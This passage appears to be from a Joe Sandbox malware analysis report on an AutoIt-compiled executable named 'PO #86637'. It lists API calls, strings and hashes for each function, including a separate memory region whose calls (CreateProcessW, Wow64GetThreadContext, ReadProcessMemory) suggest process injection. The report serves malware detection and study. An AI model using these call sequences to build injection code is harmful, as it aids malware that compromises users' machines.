                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                      • ImageList_ReplaceIcon.COMCTL32(009D0880,000000FF,00000000), ref: 00410552
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                      • RegisterClassExW.USER32(?), ref: 0041045D
                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009D0880,000000FF,00000000), ref: 00410552
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                      • String ID: #$0$AutoIt v3
                      • API String ID: 423443420-4155596026
                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _malloc
                      • String ID: Default
                      • API String ID: 1579825452-753088835

                      Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __fread_nolock_fseek_memmove_strcat
                      • String ID: AU3!$EA06
                      • API String ID: 1268643489-2658333250

                      Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                      • CreatePopupMenu.USER32 ref: 00401204
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated
                      • API String ID: 129472671-2362178303

                      Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                      APIs
                      • _malloc.LIBCMT ref: 004115F1
                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                      • std::exception::exception.LIBCMT ref: 00411626
                      • std::exception::exception.LIBCMT ref: 00411640
                      • __CxxThrowException@8.LIBCMT ref: 00411651
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                      • String ID: ,*H$4*H$@fI
                      • API String ID: 615853336-1459471987

                      Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                      APIs
                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040D1719
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040D193F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0

                      Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: QueryValue$CloseOpen
                      • String ID: Include$Software\AutoIt v3\AutoIt
                      • API String ID: 1586453840-614718249

                      Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399

                      Control-flow Graph (graph image not extracted; legend: Executed / Not Executed)
                      APIs
                        • Part of subcall function 040D12F8: Sleep.KERNELBASE(000001F4), ref: 040D1309
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040D153A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: SIR3NJ9TQU78AE1L6PI9UQIM6OS
                      • API String ID: 2694422964-1143992182
                      APIs
                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Close$OpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 1607946009-824357125
                      APIs
                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                      • _wcsncpy.LIBCMT ref: 004102ED
                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                      • _wcsncpy.LIBCMT ref: 00410340
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                      • String ID:
                      • API String ID: 3170942423-0
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 040D0AB3
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D0B49
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D0B6B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: Error:
                      • API String ID: 4104443479-232661952
                      APIs
                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                      • String ID: X$pWH
                      • API String ID: 85490731-941433119
                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                      APIs
                      • _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • _memmove.LIBCMT ref: 00401B57
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                      • String ID: @EXITCODE
                      • API String ID: 2734553683-3436989551
                      • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                      • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                      • String ID:
                      • API String ID: 1794320848-0
                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$CurrentTerminate
                      • String ID:
                      • API String ID: 2429186680-0
                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                      APIs
                      • _malloc.LIBCMT ref: 0043214B
                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                      • _malloc.LIBCMT ref: 0043215D
                      • _malloc.LIBCMT ref: 0043216F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _malloc$AllocateHeap
                      • String ID:
                      • API String ID: 680241177-0
                      • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                      • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                      APIs
                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                      • _free.LIBCMT ref: 004295A0
                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                      • String ID: >>>AUTOIT SCRIPT<<<
                      • API String ID: 3938964917-2806939583
                      • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                      • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                      Strings
                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _strcat
                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                      • API String ID: 1765576173-2684727018
                      • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                      • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                      APIs
                      • __wsplitpath.LIBCMT ref: 004678F7
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLast__wsplitpath_malloc
                      • String ID:
                      • API String ID: 4163294574-0
                      • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                      • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                      • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                      • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                      APIs
                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
